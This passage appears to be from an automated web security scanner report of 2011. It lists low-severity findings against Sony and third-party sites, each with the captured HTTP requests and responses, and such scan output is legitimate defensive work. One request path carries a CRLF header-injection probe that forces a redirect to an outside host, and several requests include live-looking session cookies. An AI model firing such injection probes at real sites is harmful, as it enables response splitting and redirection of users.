The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


15.1. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 23 Jun 2011 15:00:01 GMT
Expires: Thu, 23 Jun 2011 15:00:01 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

15.2. http://www.googleadservices.com/pagead/conversion/1047459996/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1047459996/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 23 Jun 2011 14:59:54 GMT
Expires: Thu, 23 Jun 2011 14:59:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

15.3. http://www.omnitechsupport.com/sony/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.omnitechsupport.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Mar 2011 21:51:01 GMT
ETag: "aa556a-91-b9865b40"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.omnitechsupport.com

User-agent: *
Disallow: /services/


Sitemap: http://www.omnitechsupport.com/sitemap.xml

16. Cacheable HTTPS response

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

17. HTML does not specify charset
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


17.1. http://www.docs.sony.com/reflib/docget.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

17.2. http://www.docs.sony.com/startchat.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docs.sony.com
Path:   /startchat.asp

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6969
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/
Cache-control: private


<HTML>
   <HEAD>
       <TITLE>Sony eSupport Live Chat Support</TITLE>
       <SCRIPT language="javascript">
       function openTrademarkLink(){window.open('http://products.sel.sony.com/SEL/legal/notice.html','
...[SNIP]...

17.3. http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /4a76d%0d%0aLocation:%20http://xss.cx

Request

GET /4a76d%0d%0aLocation:%20http://xss.cx HTTP/1.1
Host: www.sonystyle.com
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.0 408 Request Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Date: Thu, 23 Jun 2011 15:24:19 GMT
Content-Type: text/html
Content-Length: 218
Expires: Thu, 23 Jun 2011 15:24:19 GMT

<HTML><HEAD>
<TITLE>Request Timeout</TITLE>
</HEAD><BODY>
<H1>Request Timeout</H1>
The server timed out while waiting for the browser's request.<P>
Reference&#32;&#35;2&#46;881ff648&#46;1308842659&#46
...[SNIP]...

17.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId
=10551&storeId=10151&langId=-1&identifier=S_Sony_Howdini HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:00 GMT
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;881ff648&#46;1308842400&#46;0

...[SNIP]...

17.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter
=false&storeId=10151&catalogId=10551&langId=-1&cmsId=STATICS_BIV_showcase HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:02 GMT
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;881ff648&#46;1308842402&#46;0

...[SNIP]...

17.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:32 GMT
Content-Length: 988

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...

17.7. https://www.websitealive5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

18. Content type incorrectly stated
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


18.1. http://sr2.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71737897 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71737897
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1dbf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Thu, 23 Jun 2011 14:58:27 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

18.2. http://www.apache.org/licenses/LICENSE-2.0

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apache.org
Path:   /licenses/LICENSE-2.0

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /licenses/LICENSE-2.0 HTTP/1.1
Host: www.apache.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:39 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0c
Content-Location: LICENSE-2.0.txt
Vary: negotiate,accept
TCN: choice
Last-Modified: Mon, 01 Nov 2010 19:49:36 GMT
ETag: "d23b5d-2c5e-494031b9e1400;49ce17c126e80"
Accept-Ranges: bytes
Content-Length: 11358
Cache-Control: max-age=3600
Expires: Thu, 23 Jun 2011 16:19:39 GMT
Connection: close
Content-Type: text/plain; charset=utf-8


Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUC
...[SNIP]...

18.3. http://www.docs.sony.com/reflib/docget.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

18.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:32 GMT
Content-Length: 988

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...

18.5. https://www.websitealive5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

19. Content type is not specified
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


19.1. http://www.sonystyle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:23:49 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182655</body></html>

19.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_Weekly_Deals&categoryKey=Computers HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182439</body></html>
